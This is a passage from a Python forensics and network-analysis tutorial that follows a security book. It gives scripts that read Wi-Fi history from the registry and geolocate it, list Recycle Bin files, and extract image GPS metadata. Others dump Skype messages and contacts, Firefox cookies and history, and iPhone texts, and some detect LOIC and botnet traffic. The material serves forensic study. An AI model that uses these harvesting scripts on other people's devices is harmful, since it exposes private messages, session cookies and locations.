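    """Format the first six bytes of a REG_BINARY value as a MAC address."""
    # Iterating over bytes in Python 3 yields integers, so ord() is not needed.
    return ":".join("%02x" % b for b in bytes(val)[:6])


if __name__ == "__main__":
    # Hypothetical gateway MAC value, for illustration only.
    print(val2addr(b"\x00\x11\x50\x24\x68\x7f"))
```

Slicing to six bytes mirrors the [0:17] slice in the original, which keeps exactly six colon-separated hex pairs.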

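Using Mechanize to submit the MAC address to Wigle:

This version adds a request to the Wigle website, passing it the MAC address to obtain physical location information such as latitude and longitude.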

#!/usr/bin/python

#coding=utf-8

from _winreg import *

import mechanize

import urllib

import re

import urlparse

import os

import optparse

# Convert a REG_BINARY value into a readable MAC address

def val2addr(val):

addr = ""

for ch in val:

addr += ("%02x " % ord(ch))

addr = addr.strip(" ").replace(" ", ":")[0:17]

return addr

# Print information about the networks

def printNets(username, password):

net = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged"

key = OpenKey(HKEY_LOCAL_MACHINE, net)

print "\n[*]Networks You have Joined."

for i in range(100):

try:

guid = EnumKey(key, i)

netKey = OpenKey(key, str(guid))

(n, addr, t) = EnumValue(netKey, 5)

(n, name, t) = EnumValue(netKey, 4)

macAddr = val2addr(addr)

netName = name

print '[+] ' + netName + ' ' + macAddr

wiglePrint(username, password, macAddr)

CloseKey(netKey)

except:

break

# Look up the latitude and longitude for a MAC address via Wigle

def wiglePrint(username, password, netid):

browser = mechanize.Browser()

browser.open('http://wigle.net')

reqData = urllib.urlencode({'credential_0': username, 'credential_1': password})

browser.open('https://wigle.net/gps/gps/main/login', reqData)

params = {}

params['netid'] = netid

reqParams = urllib.urlencode(params)

respURL = 'http://wigle.net/gps/gps/main/confirmquery/'

resp = browser.open(respURL, reqParams).read()

mapLat = 'N/A'

mapLon = 'N/A'

rLat = re.findall(r'maplat=.*\&', resp)

if rLat:

mapLat = rLat[0].split('&')[0].split('=')[1]

rLon = re.findall(r'maplon=.*\&', resp)

if rLon:

mapLon = rLon[0].split('&')[0].split('=')[1]

print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon

def main():

parser = optparse.OptionParser('usage %prog ' + '-u <wigle username> -p <wigle password>')

parser.add_option('-u', dest='username', type='string', help='specify wigle username')

parser.add_option('-p', dest='password', type='string', help='specify wigle password')

(options, args) = parser.parse_args()

username = options.username

password = options.password

if username == None or password == None:

print parser.usage

exit(0)

else:

printNets(username, password)

if __name__ == '__main__':

main()

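Result:

Only one entry is displayed, and it carries no physical location information, so something is wrong.

Debugging to find the cause:

It turns out that the site's robots.txt disallows requests to that page, so it cannot be accessed.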
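Independently of the access problem, the latitude/longitude extraction step in wiglePrint() can be exercised offline. The sketch below assumes Python 3 and a made-up response fragment containing maplat= and maplon= parameters; the function name extract_coords is hypothetical and the real page layout may differ.

```python
import re


def extract_coords(resp):
    """Return (lat, lon) strings found in resp, or 'N/A' for a missing value."""
    # [^&]* stops at the first '&', so no extra split() is needed afterwards.
    lat = re.search(r"maplat=([^&]*)&", resp)
    lon = re.search(r"maplon=([^&]*)&", resp)
    return (lat.group(1) if lat else "N/A",
            lon.group(1) if lon else "N/A")


if __name__ == "__main__":
    # Hypothetical fragment, for illustration only.
    print(extract_coords("map?maplat=47.25&maplon=-122.44&mapzoom=17"))
```

The script in these notes uses a greedy `.*` and then trims the match with split('&'); capturing up to the first '&' directly gives the same value in one step.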





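2. Using Python to Recover Deleted Items in the Recycle Bin:

Using the os module to find deleted files and folders:

The Recycle Bin in Windows is a special folder that holds deleted files.

Each subdirectory name in it is a user SID, which corresponds to one unique user account on the machine.

A function that locates the Recycle Bin directory: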

#!/usr/bin/python

#coding=utf-8

import os

# Test each candidate Recycle Bin directory in turn and return the first one that exists

def returnDir():

dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']

for recycleDir in dirs:

if os.path.isdir(recycleDir):

return recycleDir

return None

Using Python to correlate SIDs with usernames:

The Windows registry can be used to translate a SID into an exact username.



Run cmd with administrator privileges and enter the command:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2595130515-3345905091-1839164762-1000" /s

The code is as follows:

#!/usr/bin/python

#coding=utf-8

import os

import optparse

from _winreg import *

# Test each candidate Recycle Bin directory in turn and return the first one that exists

def returnDir():

dirs=['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\\']

for recycleDir in dirs:

if os.path.isdir(recycleDir):

return recycleDir

return None

# Query the registry for the username that owns the given SID directory

def sid2user(sid):

try:

key = OpenKey(HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" + '\\' + sid)

(value, type) = QueryValueEx(key, 'ProfileImagePath')

user = value.split('\\')[-1]

return user

except:

return sid



def findRecycled(recycleDir):

dirList = os.listdir(recycleDir)

for sid in dirList:

files = os.listdir(recycleDir + sid)

user = sid2user(sid)

print '\n[*] Listing Files For User: ' + str(user)

for file in files:

print '[+] Found File: ' + str(file)

def main():

recycledDir = returnDir()

findRecycled(recycledDir)

if __name__ == '__main__':

main()
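The last step of sid2user(), taking the final component of ProfileImagePath as the username, can be tried on any platform. This is a minimal sketch assuming Python 3; the function name user_from_profile_path and the sample paths are hypothetical.

```python
import ntpath


def user_from_profile_path(profile_path):
    """Return the last component of a Windows profile path, e.g. the username."""
    # ntpath applies Windows path rules even when run on Linux or macOS.
    return ntpath.basename(profile_path.rstrip("\\"))


if __name__ == "__main__":
    # Hypothetical ProfileImagePath value, for illustration only.
    print(user_from_profile_path(r"C:\Users\alice"))
```

Using ntpath instead of split('\\')[-1] also tolerates a trailing backslash in the registry value.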

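Contents of the Recycle Bin:

Result:

3. Metadata:

Using PyPDF to parse PDF metadata:

pyPdf is a third-party Python library for working with PDF documents. It is preinstalled on Kali, so no separate download is needed.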

#!/usr/bin/python

#coding=utf-8

import pyPdf

import optparse

from pyPdf import PdfFileReader

# Use getDocumentInfo() to extract all metadata from the PDF document

def printMeta(fileName):

pdfFile = PdfFileReader(file(fileName, 'rb'))

docInfo = pdfFile.getDocumentInfo()

print "[*] PDF MetaData For: " + str(fileName)

for metaItem in docInfo:

print "[+] " + metaItem + ": " + docInfo[metaItem]

def main():

parser = optparse.OptionParser("[*]Usage: python pdfread.py -F ")

parser.add_option('-F', dest='fileName', type='string', help='specify PDF file name')

(options, args) = parser.parse_args()

fileName = options.fileName

if fileName == None:

print parser.usage

exit(0)

else:

printMeta(fileName)

if __name__ == '__main__':

main()



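Result of parsing a PDF file:

Understanding Exif metadata:

Exif (Exchangeable image file format) is a standard that defines how metadata is stored in image and audio files.

Downloading images with BeautifulSoup: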

import urllib2

from bs4 import BeautifulSoup as BS

from os.path import basename

from urlparse import urlsplit

# Use BeautifulSoup to find all img tags on the page at the given URL

def findImages(url):

print '[+] Finding images on ' + url

urlContent = urllib2.urlopen(url).read()

soup = BS(urlContent, 'lxml')

imgTags = soup.findAll('img')

return imgTags

# Download the image from the URL in the img tag's src attribute

def downloadImage(imgTag):

try:

print '[+] Downloading image...'

imgSrc = imgTag['src']

imgContent = urllib2.urlopen(imgSrc).read()

imgFileName = basename(urlsplit(imgSrc)[2])

imgFile = open(imgFileName, 'wb')

imgFile.write(imgContent)

imgFile.close()

return imgFileName

except:

return ' '
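The local file name in downloadImage() comes from basename(urlsplit(imgSrc)[2]), that is, the last segment of the URL path with any query string dropped. A minimal sketch of that step, assuming Python 3 (where urlsplit lives in urllib.parse) and made-up URLs; image_filename is a hypothetical helper name:

```python
import posixpath
from urllib.parse import urlsplit


def image_filename(img_src):
    """Derive a local file name from the path part of an image URL."""
    # .path is element [2] of the split result; the query string is ignored.
    return posixpath.basename(urlsplit(img_src).path)


if __name__ == "__main__":
    # Hypothetical URL, for illustration only.
    print(image_filename("http://example.com/a/b/photo.jpg?size=o"))
```

A URL whose path ends in a slash yields an empty name, which is one reason the download can fail and fall into the except branch.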

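Reading Exif metadata from images with the Python Imaging Library:

The Python Imaging Library (PIL) is used here; it is preinstalled on Kali.

The script checks whether the metadata of each downloaded image contains the Exif tag "GPSInfo" and reports it if present.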

#!/usr/bin/python

#coding=utf-8

import optparse

from PIL import Image

from PIL.ExifTags import TAGS

import urllib2

from bs4 import BeautifulSoup as BS

from os.path import basename

from urlparse import urlsplit

# Use BeautifulSoup to find all img tags on the page at the given URL

def findImages(url):

print '[+] Finding images on ' + url

urlContent = urllib2.urlopen(url).read()

soup = BS(urlContent, 'lxml')

imgTags = soup.findAll('img')

return imgTags

# Download the image from the URL in the img tag's src attribute

def downloadImage(imgTag):

try:

print '[+] Downloading image...'

imgSrc = imgTag['src']

imgContent = urllib2.urlopen(imgSrc).read()

imgFileName = basename(urlsplit(imgSrc)[2])

imgFile = open(imgFileName, 'wb')

imgFile.write(imgContent)

imgFile.close()

return imgFileName

except:

return ' '

# Read the image metadata and check for the Exif tag "GPSInfo"

def testForExif(imgFileName):

try:

exifData = {}

imgFile = Image.open(imgFileName)

info = imgFile._getexif()

if info:

for (tag, value) in info.items():

decoded = TAGS.get(tag, tag)

exifData[decoded] = value

exifGPS = exifData['GPSInfo']

if exifGPS:

print '[*] ' + imgFileName + ' contains GPS MetaData'

except:

pass

def main():

parser = optparse.OptionParser('[*]Usage: python Exif.py -u ')

parser.add_option('-u', dest='url', type='string', help='specify url address')

(options, args) = parser.parse_args()

url = options.url

if url == None:

print parser.usage

exit(0)

else:

imgTags = findImages(url)

for imgTag in imgTags:

imgFileName = downloadImage(imgTag)

testForExif(imgFileName)

if __name__ == '__main__':

main()

The sample URL used in the book is https://www.flickr.com/photos/dvids/4999001925/sizes/o

Result:

4. Investigating Application Artifacts with Python:



Using Python and SQLite3 to automate Skype database queries:

Skype is not installed here; interested readers can install it and test for themselves.

#!/usr/bin/python

#coding=utf-8

import sqlite3

import optparse

import os

# Connect to main.db, obtain a cursor, run the SQL query and print the results

def printProfile(skypeDB):

conn = sqlite3.connect(skypeDB)

c = conn.cursor()

c.execute("SELECT fullname, skypename, city, country, datetime(profile_timestamp,'unixepoch') FROM Accounts;")

for row in c:

print '[*] -- Found Account --'

print '[+] User : '+str(row[0])

print '[+] Skype Username : '+str(row[1])

print '[+] Location : '+str(row[2])+','+str(row[3])

print '[+] Profile Date : '+str(row[4])

# Print information about the contacts

def printContacts(skypeDB):

conn = sqlite3.connect(skypeDB)

c = conn.cursor()

c.execute("SELECT displayname, skypename, city, country, phone_mobile, birthday FROM Contacts;")

for row in c:

print '\n[*] -- Found Contact --'

print '[+] User : ' + str(row[0])

print '[+] Skype Username : ' + str(row[1])

if str(row[2]) != '' and str(row[2]) != 'None':

print '[+] Location : ' + str(row[2]) + ',' + str(row[3])

if str(row[4]) != 'None':

print '[+] Mobile Number : ' + str(row[4])

if str(row[5]) != 'None':

print '[+] Birthday : ' + str(row[5])

def printCallLog(skypeDB):

conn = sqlite3.connect(skypeDB)

c = conn.cursor()

c.execute("SELECT datetime(begin_timestamp,'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;")

print '\n[*] -- Found Calls --'

for row in c:

print '[+] Time: ' + str(row[0]) + ' | Partner: ' + str(row[1])

def printMessages(skypeDB):

conn = sqlite3.connect(skypeDB)

c = conn.cursor()

c.execute("SELECT datetime(timestamp,'unixepoch'), dialog_partner, author, body_xml FROM Messages;")

print '\n[*] -- Found Messages --'

for row in c:

try:

if 'partlist' not in str(row[3]):

if str(row[1]) != str(row[2]):

msgDirection = 'To ' + str(row[1]) + ': '

else:

msgDirection = 'From ' + str(row[2]) + ' : '

print 'Time: ' + str(row[0]) + ' ' + msgDirection + str(row[3])

except:

pass

def main():

parser = optparse.OptionParser("[*]Usage: python skype.py -p ")

parser.add_option('-p', dest='pathName', type='string', help='specify skype profile path')

(options, args) = parser.parse_args()

pathName = options.pathName

if pathName == None:

print parser.usage

exit(0)

elif os.path.isdir(pathName) == False:

print '[!] Path Does Not Exist: ' + pathName

exit(0)

else:

skypeDB = os.path.join(pathName, 'main.db')

if os.path.isfile(skypeDB):

printProfile(skypeDB)

printContacts(skypeDB)

printCallLog(skypeDB)

printMessages(skypeDB)

else:

print '[!] Skype Database ' + 'does not exist: ' + skypeDB

if __name__ == '__main__':

main()
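The queries above rely on SQLite's datetime(..., 'unixepoch') to turn stored integers into readable timestamps. The sketch below shows the same pattern against an in-memory database, assuming Python 3; the table is a cut-down, hypothetical stand-in for the Accounts table, not the real Skype schema.

```python
import sqlite3


def build_demo_db():
    """Create an in-memory database with a simplified, made-up Accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts "
                 "(fullname TEXT, skypename TEXT, profile_timestamp INTEGER)")
    conn.execute("INSERT INTO Accounts VALUES (?, ?, ?)",
                 ("Demo User", "demo.user", 0))
    conn.commit()
    return conn


def list_accounts(conn):
    """Return (fullname, skypename, UTC timestamp string) rows."""
    cur = conn.cursor()
    cur.execute("SELECT fullname, skypename, "
                "datetime(profile_timestamp, 'unixepoch') FROM Accounts;")
    return cur.fetchall()


if __name__ == "__main__":
    for row in list_accounts(build_demo_db()):
        print(row)
```

A stored value of 0 comes back as 1970-01-01 00:00:00, which is a quick way to confirm that a column really holds seconds since the Unix epoch.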

Here the script is tested directly against the sample data provided by the book's author:



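Parsing Firefox SQLite3 databases with Python:

On Windows 7 and later, Firefox keeps its sqlite files in a directory similar to: C:\Users\win7\AppData\Roaming\Mozilla\Firefox\Profiles\8eogekr4.default

The files of interest are cookies.sqlite, places.sqlite and downloads.sqlite.

Recent Firefox versions no longer have a downloads.sqlite file, however; which file replaced it is left for the reader to investigate.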

#!/usr/bin/python

#coding=utf-8

import re

import optparse

import os

import sqlite3

# Parse downloads.sqlite and print information about downloaded files

def printDownloads(downloadDB):

conn = sqlite3.connect(downloadDB)

c = conn.cursor()

c.execute('SELECT name, source, datetime(endTime/1000000, \'unixepoch\') FROM moz_downloads;')

print '\n[*] --- Files Downloaded --- '

for row in c:

print '[+] File: ' + str(row[0]) + ' from source: ' + str(row[1]) + ' at: ' + str(row[2])

# Parse cookies.sqlite and print cookie information

def printCookies(cookiesDB):

try:

conn = sqlite3.connect(cookiesDB)

c = conn.cursor()

c.execute('SELECT host, name, value FROM moz_cookies')

print '\n[*] -- Found Cookies --'

for row in c:

host = str(row[0])

name = str(row[1])

value = str(row[2])

print '[+] Host: ' + host + ', Cookie: ' + name + ', Value: ' + value

except Exception, e:

if 'encrypted' in str(e):

print '\n[*] Error reading your cookies database.'

print '[*] Upgrade your Python-Sqlite3 Library'

# Parse places.sqlite and print the browsing history

def printHistory(placesDB):

try:

conn = sqlite3.connect(placesDB)

c = conn.cursor()

c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")

print '\n[*] -- Found History --'

for row in c:

url = str(row[0])

date = str(row[1])

print '[+] ' + date + ' - Visited: ' + url

except Exception, e:

if 'encrypted' in str(e):

print '\n[*] Error reading your places database.'

print '[*] Upgrade your Python-Sqlite3 Library'

exit(0)

# Parse places.sqlite and print the Baidu search history

def printBaidu(placesDB):

conn = sqlite3.connect(placesDB)

c = conn.cursor()

c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")

print '\n[*] -- Found Baidu --'

for row in c:

url = str(row[0])

date = str(row[1])

if 'baidu' in url.lower():

r = re.findall(r'wd=.*?\&', url)

if r:

search=r[0].split('&')[0]

search=search.replace('wd=', '').replace('+', ' ')

print '[+] '+date+' - Searched For: ' + search

def main():

parser = optparse.OptionParser("[*]Usage: firefoxParse.py -p ")

parser.add_option('-p', dest='pathName', type='string', help='specify firefox profile path')

(options, args) = parser.parse_args()

pathName = options.pathName

if pathName == None:

print parser.usage

exit(0)

elif os.path.isdir(pathName) == False:

print '[!] Path Does Not Exist: ' + pathName

exit(0)

else:

downloadDB = os.path.join(pathName, 'downloads.sqlite')

if os.path.isfile(downloadDB):

printDownloads(downloadDB)

else:

print '[!] Downloads Db does not exist: '+downloadDB

cookiesDB = os.path.join(pathName, 'cookies.sqlite')

if os.path.isfile(cookiesDB):

printCookies(cookiesDB)

else:

print '[!] Cookies Db does not exist:' + cookiesDB

placesDB = os.path.join(pathName, 'places.sqlite')

if os.path.isfile(placesDB):

printHistory(placesDB)

printBaidu(placesDB)

else:

print '[!] PlacesDb does not exist: ' + placesDB

if __name__ == '__main__':

main()

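The script above differs slightly from the book's version: the part that extracted Google search history now extracts Baidu search history instead, since Baidu is more widely used in China.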





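Result:

Apart from downloads.sqlite, which could not be found, all files were parsed correctly. In the search-term output, Chinese and other non-ASCII characters appear in their URL-encoded form.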
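The URL-encoded search terms can be decoded with the standard library instead of a regular expression. This is a minimal sketch assuming Python 3 and that the search term is carried in the wd query parameter, as in the script above; baidu_search_term is a hypothetical helper name and the URLs are made up.

```python
from urllib.parse import parse_qs, urlsplit


def baidu_search_term(url):
    """Return the decoded 'wd' query parameter of a URL, or None if absent."""
    # parse_qs percent-decodes values as UTF-8 and turns '+' into a space.
    terms = parse_qs(urlsplit(url).query).get("wd")
    return terms[0] if terms else None


if __name__ == "__main__":
    # Hypothetical history entry, for illustration only.
    print(baidu_search_term("https://www.baidu.com/s?wd=%E4%B8%AD%E6%96%87&ie=utf-8"))
```

Terms encoded in something other than UTF-8 would need the encoding argument of parse_qs; that case is not handled here.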

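5. Investigating iTunes Mobile Backups with Python:

I do not have an iPhone, so this script is untested here; readers who have one can try it themselves.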

#!/usr/bin/python

#coding=utf-8

import os

import sqlite3

import optparse

def isMessageTable(iphoneDB):

try:

conn = sqlite3.connect(iphoneDB)

c = conn.cursor()

c.execute('SELECT tbl_name FROM sqlite_master WHERE type==\"table\";')

for row in c:

if 'message' in str(row):

return True

except:

return False

def printMessage(msgDB):

try:

conn = sqlite3.connect(msgDB)

c = conn.cursor()

c.execute('select datetime(date,\'unixepoch\'), address, text from message WHERE address>0;')

for row in c:

date = str(row[0])

addr = str(row[1])

text = row[2]

print '\n[+] Date: '+date+', Addr: '+addr + ' Message: ' + text

except:

pass

def main():

parser = optparse.OptionParser("[*]Usage: python iphoneParse.py -p ")

parser.add_option('-p', dest='pathName', type='string',help='specify iPhone backup path')

(options, args) = parser.parse_args()

pathName = options.pathName

if pathName == None:

print parser.usage

exit(0)

else:

dirList = os.listdir(pathName)

for fileName in dirList:

iphoneDB = os.path.join(pathName, fileName)

if isMessageTable(iphoneDB):

try:

print '\n[*] --- Found Messages ---'

printMessage(iphoneDB)

except:

pass

if __name__ == '__main__':

main()
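The table check performed by isMessageTable() can be tried on throwaway files. The sketch below assumes Python 3; has_message_table is a hypothetical name, and unlike the script above it matches the table name exactly rather than looking for the substring 'message' and always returns a boolean.

```python
import sqlite3


def has_message_table(db_path):
    """Return True if db_path is an SQLite database containing a 'message' table."""
    try:
        conn = sqlite3.connect(db_path)
        try:
            rows = conn.execute(
                "SELECT tbl_name FROM sqlite_master WHERE type = 'table';"
            ).fetchall()
        finally:
            conn.close()
    except sqlite3.Error:
        # Files that are not SQLite databases raise an error on the first query.
        return False
    return any(name == "message" for (name,) in rows)
```

Because backup directories contain many files that are not databases at all, catching sqlite3.Error specifically keeps unrelated bugs from being silently swallowed.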

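Chapter 4: Network Traffic Analysis with Python

1. Where Is That IP Traffic Headed? A Python Answer:

Using PyGeoIP to correlate IP addresses with physical locations:

pygeoip must be installed first, either with pip install pygeoip or from GitHub: https://github.com/appliedsec/pygeoip

The GeoLiteCity database used by pygeoip must also be downloaded and extracted to obtain the GeoLiteCity.dat file: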

http://dev.maxmind.com/geoip/legacy/geolite/

Place GeoLiteCity.dat in the same directory as the script so that it can be opened directly.

#!/usr/bin/python

#coding=utf-8

import pygeoip

# Look up the city information in the database and print it

def printRecord(tgt):

rec = gi.record_by_name(tgt)

city = rec['city']

# The book's code was region = rec['region_name']; 'region_name' is deprecated, so 'region_code' is used instead

region = rec['region_code']

country = rec['country_name']

long = rec['longitude']

lat = rec['latitude']

print '[*] Target: ' + tgt + ' Geo-located. '

print '[+] '+str(city)+', '+str(region)+', '+str(country)

print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)

gi = pygeoip.GeoIP('GeoLiteCity.dat')

tgt = '173.255.226.98'



printRecord(tgt)

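Result:

Using Dpkt to parse packets:

Install the dpkt package: pip install dpkt

dpkt lets you step through a capture file packet by packet and inspect each protocol layer of every packet.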

#!/usr/bin/python

#coding=utf-8

import dpkt

import socket

def printPcap(pcap):

# Iterate over the (timestamp, packet) records

for (ts, buf) in pcap:

try:

# Parse the Ethernet frame

eth = dpkt.ethernet.Ethernet(buf)

# Get the IP layer data

ip = eth.data

# inet_ntoa() converts the packed IP address into a dotted-quad string

src = socket.inet_ntoa(ip.src)

dst = socket.inet_ntoa(ip.dst)

print '[+] Src: ' + src + ' --> Dst: ' + dst

except:

pass

def main():

f = open('geotest.pcap', 'rb')

pcap = dpkt.pcap.Reader(f)

printPcap(pcap)

if __name__ == '__main__':

main()
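To see what the Ethernet and IP layer objects are pulling out of each buffer, the same source and destination fields can be read by hand with the standard library. This is a minimal sketch assuming Python 3, an Ethernet II frame and an IPv4 header without regard to options; the helper names and the demo frame are hypothetical, and dpkt itself is not used.

```python
import socket
import struct


def parse_ipv4_addrs(frame):
    """Return (src, dst) for an Ethernet II frame carrying IPv4, else None."""
    if len(frame) < 34:  # 14-byte Ethernet header + 20-byte minimal IPv4 header
        return None
    (ethertype,) = struct.unpack("!H", frame[12:14])
    if ethertype != 0x0800:  # not IPv4
        return None
    # Source and destination sit at offsets 12 and 16 of the IPv4 header.
    return socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])


def build_demo_frame(src, dst, ethertype=0x0800):
    """Build a made-up frame with zeroed MAC addresses, for testing only."""
    eth = b"\x00" * 12 + struct.pack("!H", ethertype)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip


if __name__ == "__main__":
    print(parse_ipv4_addrs(build_demo_frame("10.0.0.1", "192.168.1.20")))
```

Returning None for non-IPv4 frames plays the role of the bare except in printPcap(), which silently skips packets that have no ip.src attribute.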



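Since little traffic was captured locally, the capture file from the book is used for the test:

Next, add a retGeoStr() function that returns the physical location for a given IP address, resolving just the city and the three-letter country code and printing them to the screen. The combined code is as follows: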

#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse

gi = pygeoip.GeoIP('GeoLiteCity.dat')

# Look up the city-level record for the target in the database and print it
def printRecord(tgt):
    rec = gi.record_by_name(tgt)
    city = rec['city']
    # The original code was region = rec['region_name']; 'region_name' is deprecated
    region = rec['region_code']
    country = rec['country_name']
    lon = rec['longitude']
    lat = rec['latitude']
    print '[*] Target: ' + tgt + ' Geo-located. '
    print '[+] '+str(city)+', '+str(region)+', '+str(country)
    print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(lon)

def printPcap(pcap):
    # Iterate over the (timestamp, packet) records in the capture
    for (ts, buf) in pcap:
        try:
            # Parse the Ethernet frame
            eth = dpkt.ethernet.Ethernet(buf)
            # Get the IP layer carried by the frame
            ip = eth.data
            # Use inet_ntoa to convert the packed IP addresses into dotted-quad strings
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            print '[+] Src: ' + src + ' --> Dst: ' + dst
            print '[+] Src: ' + retGeoStr(src) + '--> Dst: ' + retGeoStr(dst)
        except:
            # Skip packets that have no IP layer or fail to parse
            pass

# Return the physical location for the given IP address
def retGeoStr(ip):
    try:
        rec = gi.record_by_name(ip)
        city = rec['city']
        country = rec['country_code3']
        if city != '':
            geoLoc = city + ', ' + country
        else:
            geoLoc = country
        return geoLoc
    except Exception:
        # No usable record for this address
        return 'Unregistered'

def main():
    parser = optparse.OptionParser('[*]Usage: python geoPrint.py -p <pcap file>')
    parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
    (options, args) = parser.parse_args()
    if options.pcapFile is None:
        print parser.usage
        exit(0)
    pcapFile = options.pcapFile
    # Open the capture file in binary mode
    f = open(pcapFile, 'rb')
    pcap = dpkt.pcap.Reader(f)
    printPcap(pcap)

if __name__ == '__main__':
    main()



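Again using the same test capture as before:

Drawing a Google map with Python:

Here I modify the code slightly so that the KML is written to a new file instead of being printed to the console.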
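As a side note, the KML document can also be assembled with the standard library's xml.etree.ElementTree instead of string concatenation, which takes care of escaping and closing tags. The following is only a sketch under assumptions: build_kml is a hypothetical helper, the coordinates are invented rather than looked up in GeoLiteCity.dat, and it targets Python 3. KML expects coordinates in longitude,latitude order.

```python
import xml.etree.ElementTree as ET

KML_NS = 'http://www.opengis.net/kml/2.2'

def build_kml(points):
    """Build a KML document from (name, longitude, latitude) tuples."""
    kml = ET.Element('kml', xmlns=KML_NS)
    doc = ET.SubElement(kml, 'Document')
    for name, lon, lat in points:
        placemark = ET.SubElement(doc, 'Placemark')
        ET.SubElement(placemark, 'name').text = name
        point = ET.SubElement(placemark, 'Point')
        # KML coordinate order is longitude first, then latitude.
        ET.SubElement(point, 'coordinates').text = '%f,%f' % (lon, lat)
    return ET.tostring(kml, encoding='unicode')

# Invented sample point, not a real geolocation result.
sample_kml = build_kml([('173.255.226.98', -74.0, 40.7)])
print(sample_kml)
```

The returned string can be written out the same way as in the script, for example with open('googleearthPrint.kml', 'w') followed by write().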

#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse

gi = pygeoip.GeoIP('GeoLiteCity.dat')

# Build a KML Placemark from the longitude and latitude of the IP address
def retKML(ip):
    rec = gi.record_by_name(ip)
    try:
        longitude = rec['longitude']
        latitude = rec['latitude']
        kml = (
            '<Placemark>\n'
            '<name>%s</name>\n'
            '<Point>\n'
            '<coordinates>%6f,%6f</coordinates>\n'
            '</Point>\n'
            '</Placemark>\n'
        ) %(ip,longitude, latitude)
        return kml
    except:
        # No usable record for this address
        return ' '

def plotIPs(pcap):
    kmlPts = ''
    for (ts, buf) in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            srcKML = retKML(src)
            dst = socket.inet_ntoa(ip.dst)
            dstKML = retKML(dst)
            kmlPts = kmlPts + srcKML + dstKML
        except:
            pass
    return kmlPts

def main():
    parser = optparse.OptionParser('[*]Usage: python googleearthPrint.py -p <pcap file>')
    parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
    (options, args) = parser.parse_args()
    if options.pcapFile is None:
        print parser.usage
        exit(0)
    pcapFile = options.pcapFile
    # Open the capture file in binary mode
    f = open(pcapFile, 'rb')
    pcap = dpkt.pcap.Reader(f)
    kmlheader = '<?xml version="1.0" encoding="UTF-8"?>\
\n<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n'
    kmlfooter = '</Document>\n</kml>\n'
    kmldoc = kmlheader + plotIPs(pcap) + kmlfooter
    # print kmldoc
    # Write the KML to a file instead of printing it
    with open('googleearthPrint.kml', 'w') as out:
        out.write(kmldoc)
    print "[+]Created googleearthPrint.kml successfully"

if __name__ == '__main__':
    main()



Output:



Viewing the KML file:



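Next, open Google Earth: https://www.google.com/earth/

Import the KML file from the options on the left:

After importing, click any IP address to see where it is located on the map: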







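2. Can "Anonymous" Really Stay Anonymous? Analyzing LOIC Traffic:

LOIC (Low Orbit Ion Cannon) is a stress-testing tool that attackers commonly use to carry out DDoS attacks.

Using dpkt to detect LOIC downloads:

A fairly reliable download source for LOIC: https://sourceforge.net/projects/loic/

Because the download site has since moved from HTTP to HTTPS, the request headers can no longer be analyzed directly from a packet capture.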

#!/usr/bin/python
#coding=utf-8
import dpkt
import socket

def findDownload(pcap):
    for (ts, buf) in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            # Get the TCP segment
            tcp = ip.data
            # Parse the TCP payload as an HTTP request
            http = dpkt.http.Request(tcp.data)
            # A GET request whose URI contains both ".zip" and "loic" is treated as a LOIC download
            if http.method == 'GET':
                uri = http.uri.lower()
                if '.zip' in uri and 'loic' in uri:
                    print "[!] " + src + " Downloaded LOIC."
        except:
            # Skip packets that are not parsable HTTP requests
            pass

# Open the capture file in binary mode
f = open('download.pcap', 'rb')
pcap = dpkt.pcap.Reader(f)
findDownload(pcap)



Here I tested directly with the packet capture provided by the book:


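The check performed by findDownload() boils down to reading the HTTP request line and testing the method and URI. Here is a minimal sketch of that same test on raw payload bytes, without dpkt; is_loic_download is a hypothetical helper, the request URIs are invented, and the code targets Python 3. It also shows why HTTPS traffic is invisible to this approach: an encrypted payload never parses as a request line.

```python
def is_loic_download(payload):
    """Return True if the raw TCP payload looks like a GET for a LOIC zip."""
    try:
        # The request line is everything before the first CRLF.
        request_line = payload.split(b'\r\n', 1)[0].decode('ascii')
        method, uri, _version = request_line.split(' ')
    except (UnicodeDecodeError, ValueError):
        # Not a well-formed HTTP request line (for example TLS records).
        return False
    uri = uri.lower()
    return method == 'GET' and '.zip' in uri and 'loic' in uri

# Invented sample payloads for illustration.
http_get = b'GET /downloads/LOIC-1.0.zip HTTP/1.1\r\nHost: example.com\r\n\r\n'
http_post = b'POST /loic.zip HTTP/1.1\r\nHost: example.com\r\n\r\n'
tls_bytes = b'\x16\x03\x01\x02\x00'

print(is_loic_download(http_get))
print(is_loic_download(http_post))
print(is_loic_download(tls_bytes))
```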

Parsing IRC commands on the Hive server:

The following code is mainly used to detect IRC commands in botnet traffic:

#!/usr/bin/python
#coding=utf-8
import dpkt
import socket

def findHivemind(pcap):
    for (ts, buf) in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
